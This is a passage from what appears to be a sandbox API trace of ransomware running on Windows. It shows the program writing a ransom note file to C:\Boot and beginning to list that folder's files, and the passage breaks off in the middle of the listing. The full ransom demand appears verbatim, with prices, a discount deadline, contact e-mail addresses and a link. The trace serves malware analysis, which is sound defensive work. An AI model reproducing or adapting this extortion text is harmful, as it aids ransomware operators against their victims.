Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0093.773] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.773] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0093.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f78 | out: hHeap=0x630000) returned 1 [0093.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0093.774] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0093.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.774] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.774] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0093.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.775] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.775] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.776] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.776] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.777] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.777] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0093.778] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.778] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.778] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.778] PathFindFileNameW (pszPath="") returned="" [0093.778] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.779] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.779] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x335e120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.779] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.779] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0093.779] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0093.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.779] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0093.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0093.780] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0093.780] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0093.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0093.780] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0093.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0093.780] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0093.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0093.781] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0093.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0093.781] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0093.781] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0093.781] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0093.782] CloseHandle (hObject=0x5c8) returned 1 [0093.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0093.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0093.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0093.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0093.782] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0093.782] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17023e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17023e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0093.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0093.783] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17023e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17023e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.783] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0093.783] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0093.783] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0093.783] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0093.783] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, 